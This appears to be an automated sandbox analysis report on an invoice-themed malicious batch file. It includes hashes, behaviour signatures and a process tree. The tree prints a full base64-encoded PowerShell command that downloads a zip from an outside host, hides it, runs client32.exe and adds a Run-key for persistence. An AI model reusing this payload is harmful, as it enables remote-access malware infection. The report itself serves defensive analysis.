Analysis
-
max time kernel
295s -
max time network
291s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-de -
resource tags
arch:x64arch:x86image:win10v2004-20230221-delocale:de-deos:windows10-2004-x64systemwindows -
submitted
14-04-2023 11:38
Static task
static1
Behavioral task
behavioral1
Sample
Rechnung tfdp.bat
Resource
win10v2004-20230221-de
Behavioral task
behavioral2
Sample
Rechnungs/SM.ps1
Resource
win10v2004-20230220-de
General
-
Target
Rechnung tfdp.bat
-
Size
80B
-
MD5
74519b998ff28949d9832d83ae2b762d
-
SHA1
958a9c7b79836263e4faa9c453396edf57cbf0af
-
SHA256
3fe0959462a072cc684bad5738419f1f040caca84477a184fdd719ad0a3b21aa
-
SHA512
72d186c5dbdca6c266dc5f1e33de485df98bc8b619e795f5211830767fe04b7ed5808869c657779e32cd0afbc77a9f70eaaceced59e3c9b5cedddb31c45039b5
Malware Config
Extracted
https://this-is-vip.site/trs.zip
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ONEN0TEupdate = "C:\\Users\\Admin\\AppData\\Roaming\\ONEN0TEupdate\\client32.exe" powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4136 powershell.exe 4136 powershell.exe 4212 powershell.exe 4212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4136 powershell.exe Token: SeDebugPrivilege 4212 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1232 wrote to memory of 4136 1232 cmd.exe 85 PID 1232 wrote to memory of 4136 1232 cmd.exe 85 PID 4136 wrote to memory of 4212 4136 powershell.exe 86 PID 4136 wrote to memory of 4212 4136 powershell.exe 86
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Rechnung tfdp.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File ".\SM.ps1"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -windowstyle minimized -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACIAaAB0AHQAcABzADoALwAvAHQAaABpAHMALQBpAHMALQB2AGkAcAAuAHMAaQB0AGUALwB0AHIAcwAuAHoAaQBwACIAOwAgACQAcABhAHQAaAA9ACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACsAIgBcAHQAcgB0AC4AegBpAHAAIgA7ACAAJABwAHoAaQBwAD0AJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAKwAiAFwATwBOAEUATgAwAFQARQB1AHAAZABhAHQAZQAiADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAALgBcAHQAcgB0AC4AegBpAHAAIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBwAGEAdABoACAAJABwAHoAaQBwADsAIAAkAEYATwBMAEQAPQBHAGUAdAAtAEkAdABlAG0AIAAkAHAAegBpAHAAIAAtAEYAbwByAGMAZQA7ACAAJABGAE8ATABEAC4AYQB0AHQAcgBpAGIAdQB0AGUAcwA9ACcASABpAGQAZABlAG4AJwA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBwAGEAdABoACAAJABwAGEAdABoADsAIABjAGQAIAAkAHAAegBpAHAAOwAgAHMAdABhAHIAdAAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsAIAAkAGYAcwB0AHIAPQAkAHAAegBpAHAAKwAiAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAIgA7ACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIATwBOAEUATgAwAFQARQB1AHAAZABhAHQAZQAiACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAOwA=3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2204
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD57f3eefe85bfa5a7893d2fd007bfc8695
SHA106be01e43200fe7ed58abd49a0477a52aece68ab
SHA25663389a084cd07bfae485891e3639843c77c6e870124a84f41568c824522751c7
SHA51243fd1dc2ab3cd21865e6d03b8e0494d6924fdd4056ea6b60c41638dd57dd246168a4e1652eaa005c3f95cb95a8d07bfcbf41c9df81f568278939a100dda006a0
-
Filesize
64B
MD5feadc4e1a70c13480ef147aca0c47bc0
SHA1d7a5084c93842a290b24dacec0cd3904c2266819
SHA2565b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82